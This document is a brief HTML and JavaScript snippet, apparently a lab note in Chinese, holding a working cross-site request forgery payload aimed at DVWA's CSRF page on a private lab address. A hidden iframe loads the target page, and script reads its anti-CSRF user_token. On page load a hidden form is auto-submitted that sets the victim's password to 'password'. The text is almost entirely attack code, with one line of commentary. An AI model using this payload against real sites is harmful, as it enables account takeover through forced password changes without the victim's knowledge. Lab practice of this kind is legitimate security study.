<script type="text/javascript"> function attack() { document.getElementsByName('user_token')[0].value=document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value; document.getElementById("transfer").submit(); } </script> <iframe src="http://192.168.153.130/dvwa/vulnerabilities/csrf" id="hack" border="0" style="display:none;"> </iframe> <body onload="attack()"> <form method="GET" id="transfer" action="http://192.168.153.130/dvwa/vulnerabilities/csrf"> <input type="hidden" name="password_new" value="password"> <input type="hidden" name="password_conf" value="password"> <input type="hidden" name="user_token" value=""> <input type="hidden" name="Change" value="Change"> </form> </body>
跨站取目标站点元素值
document.getElementById("hack").contentWindow.document.getElementsByName('user_token')[0].value